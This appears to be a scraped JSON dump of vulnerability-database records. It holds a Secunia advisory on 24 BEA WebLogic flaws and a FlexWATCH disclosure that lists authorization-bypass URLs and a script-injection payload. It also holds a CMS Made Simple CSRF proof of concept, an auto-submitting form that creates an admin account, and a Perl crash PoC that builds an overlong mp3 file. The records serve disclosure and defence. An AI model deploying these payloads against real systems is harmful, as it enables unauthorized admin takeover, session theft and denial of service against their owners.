6.x\r\nhttp://secunia.com/product/1281/\r\n\r\nDESCRIPTION:\r\n24 vulnerabilities and security issues have been reported in WebLogic\r\nServer and WebLogic Express, where the most critical ones potentially\r\ncan be exploited by malicious users to gain escalated privileges and\r\nby malicious people to conduct cross-site scripting and HTTP request\r\nsmuggling attacks, cause a DoS (Denial of Service), and bypass\r\ncertain security restrictions.\r\n\r\n1) An error in the thread handling of the server can be exploited by\r\nmalicious clients to hang threads on a vulnerable server.\r\n\r\nThe vulnerability affects the following versions:\r\n* WebLogic Server / Express 8.1 through Service Pack 4 (all\r\nplatforms)\r\n* WebLogic Server / Express 7.0 through Service Pack 5 (all\r\nplatforms)\r\n* WebLogic Server / Express 6.1 through Service Pack 7 (all\r\nplatforms)\r\n\r\n2) Some unspecified input isn't properly sanitised before being\r\nreturned to the user. This can be exploited to execute arbitrary HTML\r\nand script code in a user's or administrator's browser session in\r\ncontext of an affected site.\r\n\r\nThis is related to vulnerability #6 in:\r\nSA15486\r\n\r\nThe vulnerability affects the following versions:\r\n* WebLogic Server / Express 9.0 initial release (all platforms)\r\n* WebLogic Server / Express 8.1 through Service Pack 4 (all\r\nplatforms)\r\n* WebLogic Server / Express 7.0 through Service Pack 6 (all\r\nplatforms)\r\n* WebLogic Server / Express 6.1 through Service Pack 7 (all\r\nplatforms)\r\n\r\n3) The problem is that Java client applications using the SSL\r\nprotocol without specifying a user, may in certain situations be\r\ncommunicating insecurely with an unencrypted protocol.\r\n\r\nThe security issue affects the following versions:\r\n* WebLogic Server / Express 8.1 through Service Pack 3 (all\r\nplatforms)\r\n* WebLogic Server / Express 7.0 through Service Pack 6 (all\r\nplatforms)\r\n* WebLogic Server / Express 6.1 through Service Pack 7 (all\r\nplatforms)\r\n\r\n4) The problem is that if a Java client application creates both\r\ninsecure and secure (SSL) connections to a server, then an insecure\r\nconnection will be established instead of the intended secure\r\nconnection in certain situations.\r\n\r\nThe security issue affects the following versions:\r\n* WebLogic Server / Express 8.1 through Service Pack 4 (all\r\nplatforms)\r\n* WebLogic Server / Express 7.0 through Service Pack 6 (all\r\nplatforms)\r\n* WebLogic Server / Express 6.1 through Service Pack 7 (all\r\nplatforms)\r\n\r\n5) An error in the deploying of Web applications and EJBs can be\r\nexploited by a malicious web application with Deployer privileges to\r\ngain Admin privileges via the run-as deployment descriptor element.\r\n\r\nThe vulnerability affects the following versions:\r\n* WebLogic Server / Express 8.1 through Service Pack 4 (all\r\nplatforms)\r\n* WebLogic Server / Express 7.0 through Service Pack 6 (all\r\nplatforms)\r\n\r\n6) The problem is that under heavy load some audit events may be\r\nposted with incorrect severity levels for sites which has auditing\r\nenabled. This may cause some customer filtering software to miss\r\ncertain audit events.\r\n\r\nThe security issue affects the following versions:\r\n* WebLogic Server / Express 8.1 through Service Pack 4 (all\r\nplatforms)\r\n* WebLogic Server / Express 7.0 through Service Pack 6 (all\r\nplatforms)\r\n\r\n7) The problem is that IP addresses of machines behind a firewall can\r\nbe disclosed by a malicious person via NAT (Network Address\r\nTranslation).\r\n\r\nThe vulnerability affects the following version:\r\n* WebLogic Server 8.1 through Service Pack 3 (all platforms)\r\n\r\n8) The passphrase for the Trust keystore is stored in clear text in\r\nthe "nodemanager.config" file. This can be exploited to disclose the\r\nserver's private keys.\r\n\r\nSuccessful exploitation requires file access to the\r\n"nodemanager.config" file.\r\n\r\nThe security issue affects the following version:\r\n* WebLogic Server 8.1 through Service Pack 3 (all platforms)\r\n\r\n9) An error where Principals from a derived Principal class is not\r\nproperly validated in certain situations, may be exploited to gain\r\nescalated privileges.\r\n\r\nThe vulnerability affects the following versions:\r\n* WebLogic Server / Express 8.1 through Service Pack 4 (all\r\nplatforms)\r\n* WebLogic Server / Express 7.0 through Service Pack 5 (all\r\nplatforms)\r\n\r\n10) An error where the servlet root URL pattern is not properly\r\nprotecting servlets, may be exploited by malicious people to access\r\ncertain servlet resources.\r\n\r\nThe vulnerability affects the following versions:\r\n* WebLogic Server / Express 8.1 through Service Pack 3 (all\r\nplatforms)\r\n* WebLogic Server / Express 7.0 through Service Pack 5 (all\r\nplatforms)\r\n\r\n11) An error in the restriction of an unspecified internal servlet in\r\nthe Administration server can be exploited to access files on the\r\nlocal files system.\r\n\r\nSuccessful exploitation requires the Admin security role.\r\n\r\nThe vulnerability affects the following version:\r\nWebLogic Server / Express 8.1 through Service Pack 3 (all platforms)\r\n\r\n12) An error in the importing of security policies from other\r\noperating systems can cause servlets being unprotected (e.g. from\r\nUNIX to Windows).\r\n\r\nThe security issue affects the following versions:\r\n* WebLogic Server / Express 8.1 (all platforms)\r\n* WebLogic Server / Express 7.0 (all platforms)\r\n\r\n13) The passphrase for the private key used to configure SSL is\r\ndisplayed in clear text on the terminal and stored in clear text in\r\nthe server log file when creating a WebLogic server domain via the\r\nconfiguration wizard.\r\n\r\nThe security issue affects the following version:\r\n* WebLogic Server 8.1 through Service Pack 3 (all platforms)\r\n\r\n14) The problem is that certain servlet resources may not be properly\r\nprotected from malicious people after an error occurs during\r\ndeployment when the fullyDelegateAuthorization mode is enabled.\r\n\r\nThe security issue affects the following versions:\r\n* WebLogic Server / Express 8.1 through Service Pack 3 (all\r\nplatforms)\r\n* WebLogic Server / Express 7.0 through Service Pack 5 (all\r\nplatforms)\r\n\r\n15) The problem is that system properties which may contain sensitive\r\ninformation (e.g. passwords) are logged to the server log file.\r\n\r\nThe security issue affects the following versions:\r\n* WebLogic Server / Express 8.1 through Service Pack 4 (all\r\nplatforms)\r\n* WebLogic Server / Express 7.0 through Service Pack 5 (all\r\nplatforms)\r\n* WebLogic Server / Express 6.1 through Service Pack 7 (all\r\nplatforms)\r\n\r\n16) The problem is that the password used to boot the server is\r\nstored in clear text in the Windows registry.\r\n\r\nThe security issue affects the following versions:\r\n* WebLogic Server / Express 8.1 through Service Pack 4 (all\r\nplatforms)\r\n* WebLogic Server / Express 7.0 through Service Pack 6 (all\r\nplatforms)\r\n* WebLogic Server / Express 6.1 through Service Pack 7 (all\r\nplatforms)\r\n\r\n17) The problem is that a password is included in a subject when\r\nusing the IIOP (Internet Inter-ORB Protocol) protocol and may be\r\nexposed in an exception to a remote client or in the server log.\r\n\r\nThe security issue affects the following versions:\r\n* WebLogic Server / Express 8.1 through Service Pack 4 (all\r\nplatforms)\r\n* WebLogic Server / Express 7.0 through Service Pack 6 (all\r\nplatforms)\r\n* WebLogic Server / Express 6.1 through Service Pack 7 (all\r\nplatforms)\r\n\r\n18) WebLogic Server / Express has a user lockout mechanism designed\r\nto protect against brute-force attacks. The problem is that the\r\nfeature can be exploited by malicious people to lockout the\r\nadministrator via multiple incorrect login requests.\r\n\r\nSuccessful exploitation requires knowledge of the administrator's\r\nusername.\r\n\r\n19) The problem is that a Deployer can use the weblogic.Deployer\r\ncommand using the insecure t3 protocol in communication with the\r\nAdministration server.\r\n\r\nThe security issue affects the following versions:\r\n* WebLogic Server / Express 8.1 through Service Pack 4 (all\r\nplatforms)\r\n* WebLogic Server / Express 7.0 through Service Pack 6 (all\r\nplatforms)\r\n\r\n20) The problem is that Multicast messages are sent in clear text in\r\nclusters.\r\n\r\nThe security issue affects the following versions:\r\n* WebLogic Server / Express 8.1 through Service Pack 4 (all\r\nplatforms)\r\n* WebLogic Server / Express 7.0 through Service Pack 5 (all\r\nplatforms)\r\n\r\n21) An error in the handling of incorrect log records may cause MBean\r\nconfiguration changes not to be saved in the audit log.\r\n\r\nThe security issue affects the following version:\r\n* WebLogic Server / Express 8.1 through Service Pack 4 (all\r\nplatforms)\r\n\r\n22) An error in the handling of malformed HTTP requests may be\r\nexploited by malicious people to conduct HTTP request smuggling\r\nattacks.\r\n\r\nThe vulnerability affects the following versions:\r\n* WebLogic Server / Express 8.1 through Service Pack 4 (all\r\nplatforms)\r\n* WebLogic Server / Express 7.0 through Service Pack 6 (all\r\nplatforms)\r\n* WebLogic Server / Express 6.1 through Service Pack 7 (all\r\nplatforms)\r\n\r\n23) An error in the handling of servlets doing relative forwarding\r\nmay cause a vulnerable site to become unusable in certain\r\nsituations.\r\n\r\nThe security issue affects the following versions:\r\n* WebLogic Server / Express 8.1 through Service Pack 4 (all\r\nplatforms)\r\n* WebLogic Server / Express 7.0 through Service Pack 6 (all\r\nplatforms)\r\n\r\n24) An error in the user lockout security mechanism allows malicious\r\npeople to perform more login requests than intended.\r\n\r\nThe security issue affects the following versions:\r\n* WebLogic Server 8.1 through Service Pack 5 (all platforms)\r\n* WebLogic Server 7.0 through Service Pack 6 (all platforms)\r\n\r\nSOLUTION:\r\nPatches and updated documentation are available (see the original\r\nvendor advisories).\r\n\r\nPROVIDED AND/OR DISCOVERED BY:\r\nReported by the vendor.\r\n\r\n2) The vendor credits:\r\n* ACROS Security\r\n* DV Bern AG\r\n* Application Security Inc\r\n* GomoR\r\n\r\nORIGINAL ADVISORY:\r\nhttp://dev2dev.bea.com/pub/advisory/138\r\nhttp://dev2dev.bea.com/pub/advisory/139\r\nhttp://dev2dev.bea.com/pub/advisory/140\r\nhttp://dev2dev.bea.com/pub/advisory/141\r\nhttp://dev2dev.bea.com/pub/advisory/142\r\nhttp://dev2dev.bea.com/pub/advisory/143\r\nhttp://dev2dev.bea.com/pub/advisory/144\r\nhttp://dev2dev.bea.com/pub/advisory/145\r\nhttp://dev2dev.bea.com/pub/advisory/146\r\nhttp://dev2dev.bea.com/pub/advisory/147\r\nhttp://dev2dev.bea.com/pub/advisory/148\r\nhttp://dev2dev.bea.com/pub/advisory/149\r\nhttp://dev2dev.bea.com/pub/advisory/150\r\nhttp://dev2dev.bea.com/pub/advisory/151\r\nhttp://dev2dev.bea.com/pub/advisory/152\r\nhttp://dev2dev.bea.com/pub/advisory/153\r\nhttp://dev2dev.bea.com/pub/advisory/154\r\nhttp://dev2dev.bea.com/pub/advisory/155\r\nhttp://dev2dev.bea.com/pub/advisory/156\r\nhttp://dev2dev.bea.com/pub/advisory/157\r\nhttp://dev2dev.bea.com/pub/advisory/158\r\nhttp://dev2dev.bea.com/pub/advisory/159\r\nhttp://dev2dev.bea.com/pub/advisory/160\r\nhttp://dev2dev.bea.com/pub/advisory/161\r\n\r\nOTHER REFERENCES:\r\nSA15486:\r\nhttp://secunia.com/advisories/15486/\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keeping their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those supplied by the vendor.\r\n", "modified": "2005-10-13T00:00:00", "published": "2005-10-13T00:00:00", "id": "SECURITYVULNS:DOC:9933", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:9933", "title": "[SA17138] BEA WebLogic 24 Vulnerabilities and Security Issues", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:18", "bulletinFamily": "software", "description": "Authentication can be bypassed.", "modified": "2004-02-25T00:00:00", "published": "2004-02-25T00:00:00", "id": "SECURITYVULNS:VULN:3475", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:3475", "title": "FlexWATCH unauthorized access", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:09", "bulletinFamily": "software", "description": "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\nApplication: FlexWATCH-Webs\r\nVendors: Seyeon TECH Co., Ltd.\r\n http://www.flexwatch.com/\r\n http://www.seyeon.co.kr\r\nVersions: <= 2.2 (NTSC)\r\nPlatforms: Windows\r\nBug: Authorization Bypass\r\nRisk: Very High\r\nExploitation: Remote with browser\r\nDate: 26 Jan 2004\r\nAuthor: Rafel Ivgi, The-Insider\r\ne-mail: the_insider@mail.com\r\nweb: http://theinsider.deep-ice.com\r\n\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\n1) Introduction\r\n2) Bugs\r\n3) The Code\r\n\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\n===============\r\n1) Introduction\r\n===============\r\n\r\nFlexWATCH is used as for remote administration and for\r\nsecurity surveillance server. Security cameras servers should\r\nnot be accessible to anyone but the administrator.\r\nSome of Las Vegas Casinos are using FlexWATCH(Tip for them)\r\nas their security surveillance server, it is ridiculous that a company\r\ninvests money in a software to increase security and instead\r\nreduces it. I can only imagine the risk for a casino which uses\r\nthis software.\r\nFlexWATCH also contains an ftp server and the machine's\r\ndial-up accounts and configuration, taking over the machine is\r\nalso possible.\r\n\r\nFlexWATCH describe their product the following way:\r\n------------------------------------------------------------------------\r\n"FlexWATCH\u2122 Network Camera and video server series are all stand-alone video\r\ntransmission system to deliver\r\ncrystal clear real time live video over the TCP/IP network. FlexWATCH\u2122\r\nSystem has a built-in web server that\r\nenable you to view live video through standard web browser such as MSIE or\r\nNetscape Navigator.\r\nOnce you connect the FlexWATCH\u2122 System to the existing network such as LAN,\r\nCable modem, DSL and assign\r\nIP address, you can view remote site from anywhere anytime through web\r\nbrowser without any viewing software.\r\n\r\nVarious types of Network camera and Video servers are provided by Seyeon\r\ntechnology to meet different customer needs.\r\nFor more information go to Network camera or Network video server page.\r\n\r\nBy combining with other supporting software and hardware, you can easily\r\nbuild up various type of solution for remote\r\nmonitoring and security."\r\n\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\n======\r\n2) Bug\r\n======\r\n\r\nAuthorization Bypass:\r\nThis case is a classic case of "Authorization Bypass" which is\r\ncaused by the use of double slash when reffering to files on the\r\nserver.\r\n\r\nusing each one of the following links will allow anyone full control\r\nover the server:\r\nhttp://<host>//app/idxam.html\r\nhttp://<host>//app/idxas.html\r\nhttp://<host>//app/idxasp.html\r\nhttp://<host>//admin/aindex.htm\r\nhttp://<host>//live.html\r\n\r\nIf an attacker will request the following url from the server:\r\nhttp://<host>/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\r\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\r\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<script>alert('xss')</script>\r\nXSS appears and the server allows an attacker to inject & execute scripts.\r\n\r\nThis vulnerability can allow attackers to rewrite the contents of the\r\nwebpage by injecting scripts to it.\r\nImagine a client of one of nextplace.com clients coming to buy something and\r\nhis credit card and\r\npersonal details are being sent to the "hacker" instead of the company.\r\nWhy? because the "hacker" can spread links and popups of the websites with\r\nthe injected scripts,\r\nmaby even a new email worm sending evil links to all the world. In addition\r\nusers cookies\r\n(that may contain the same important data) can be stolen, and creating such\r\nevil links will effect forever,\r\nbecause Internet Explorer vulnerabilities of the past and the future will be\r\na key to hurt the surfers.\r\n\r\nIn the words of securityfocus.com :\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\nIf all of these circumstances are met, an attacker may be able to exploit\r\nthis issue\r\nvia a malicious link containing arbitrary HTML and script code as part of\r\nthe hostname.\r\nWhen the malicious link is clicked by an unsuspecting user, the\r\nattacker-supplied HTML\r\nand script code will be executed by their web client. This will occur\r\nbecause the server\r\nwill echo back the malicious hostname supplied in the client's request,\r\nwithout sufficiently\r\nescaping HTML and script code.\r\n\r\nAttacks of this nature may make it possible for attackers to manipulate web\r\ncontent or to\r\nsteal cookie-based authentication credentials. It may be possible to take\r\narbitrary actions as the victim user.\r\n\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\n===========\r\n3) The Code\r\n===========\r\n\r\nAuthorization Bypass:\r\nhttp://<host>//app/idxam.html\r\nhttp://<host>//app/idxas.html\r\nhttp://<host>//app/idxasp.html\r\nhttp://<host>//admin/aindex.htm\r\nhttp://<host>//live.html\r\n\r\nCross Site Scripting:\r\nhttp://<host>/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\r\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\r\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<script>alert('xss')</script>\r\n\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\n---\r\nRafel Ivgi, The-Insider\r\nhttp://theinsider.deep-ice.com\r\n\r\n"Scripts and Codes will make me D.O.S , but they will never HACK me."\r\n", "modified": "2004-02-25T00:00:00", "published": "2004-02-25T00:00:00", "id": "SECURITYVULNS:DOC:5823", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:5823", "title": "FlexWATCH-Webs 2.2 (NTSC) Authorization Bypass", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-03-14T06:36:29", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2010-04-02T00:00:00", "published": "2010-04-02T00:00:00", "id": "1337DAY-ID-11570", "href": "https://0day.today/exploit/description/11570", "type": "zdt", "title": "CMS Made Simple 1.7 CSRF Vulnerability", "sourceData": "======================================\r\nCMS Made Simple 1.7 CSRF Vulnerability\r\n======================================\r\n\r\n\r\n# Vulnerability found in- Admin module\r\n \r\n# email [email\u00a0protected]\r\n \r\n# company aksitservices\r\n \r\n# Credit by Pratul Agrawal\r\n \r\n# Software CMS Made Simple 1.7\r\n \r\n# Category CMS / Portals\r\n \r\n# Site p4ge http://server/demo/2/10/CMS_Made_Simple\r\n \r\n# Plateform php\r\n \r\n# Greetz to Gaurav, Prateek, Vivek, Sanjay, Sourabh, Varun, sameer (My Web Team)\r\n \r\n \r\n \r\n# Proof of concept #\r\n \r\nTargeted URL: http://sever/demo/2/10/CMS_Made_Simple\r\n \r\n \r\n Script to Add admin user through Cross Site request forgery\r\n \r\n . ................................................................................................................\r\n \r\n <html>\r\n \r\n <body>\r\n \r\n <form name=\"csrf\" action=\"http://server/cmsmadesimple/admin/adduser.php\" method=\"post\">\r\n \r\n <input type=hidden name=\"sp_\" value=\"64becc90\">\r\n \r\n <input type=hidden name=\"user\" value=\"master\">\r\n \r\n <input type=hidden name=\"password\" value=\"master\">\r\n \r\n <input type=hidden name=\"passwordagain\" value=\"master\">\r\n \r\n <input type=hidden name=\"firstname\" value=\"12345\">\r\n \r\n <input type=hidden name=\"lastname\" value=\"12345\">\r\n \r\n <input type=hidden name=\"email\" value=\"[email\u00a0protected]\">\r\n \r\n <input type=hidden name=\"active\" value=\"on\">\r\n \r\n <input type=hidden name=\"groups\" value=\"1\">\r\n \r\n <input type=hidden name=\"g1\" value=\"1\">\r\n \r\n <input type=hidden name=\"adduser\" value=\"true\">\r\n \r\n \r\n </form>\r\n \r\n <script>\r\n \r\n document.csrf.submit();\r\n \r\n </script>\r\n \r\n </body>\r\n \r\n </html>\r\n \r\n . ..................................................................................................................\r\n \r\n \r\n \r\nAfter execution just refresh the page and we can see that the admin user added automatically.\r\n \r\n \r\n#If you have any questions, comments, or concerns, feel free to contact me.\r\n\r\n\r\n\r\n\n\n# 0day.today [2018-03-14] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/11570"}, {"lastseen": "2018-04-04T21:33:25", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category local exploits", "modified": "2010-03-04T00:00:00", "published": "2010-03-04T00:00:00", "id": "1337DAY-ID-11170", "href": "https://0day.today/exploit/description/11170", "type": "zdt", "title": "WinSmMuPl 1.2.5 (.mp3) Local Crash PoC", "sourceData": "======================================\r\nWinSmMuPl 1.2.5 (.mp3) Local Crash PoC\r\n======================================\r\n\r\n#!/usr/bin/perl\r\n \r\n# WinSmMuPl 1.2.5 (.mp3) Local Crash PoC\r\n \r\n# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n# 0 _ __ __ __ 1\r\n# 1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n# 0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n# 1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n# 0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n# 1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n# 0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n# 1 \\ \\____/ >> Exploit database separated by exploit 0\r\n# 0 \\/___/ type (local, remote, DoS, etc.) 1\r\n# 1 1\r\n# 0 [+] Site : Inj3ct0r.com 0\r\n# 1 [+] Support e-mail : submit[at]inj3ct0r.com 1\r\n# 0 0\r\n# 1 ###################################### 1\r\n# 0 I'm cr4wl3r member from Inj3ct0r Team 1\r\n# 1 ###################################### 0\r\n# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1\r\n \r\n#[+] Discovered By: cr4wl3r\r\n \r\n \r\nprint \"#####################################################\\n\";\r\nprint \"[!] WinSmMuPl 1.2.5 (.mp3) Local Crash PoC\\n\";\r\nprint \"\\n\";\r\nprint \"[!] By: cr4wl3r\\n\";\r\nprint \"#####################################################\\n\";\r\n \r\n \r\nmy $boom = \"A\" x 1337;\r\nmy $filename = \"sploit.mp3\";\r\nopen (FILE,\">$filename\");\r\nprint FILE \"$boom\";\r\nprint \"\\nDone!\\n\";\r\n\r\n\r\n\n# 0day.today [2018-04-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/11170"}]}
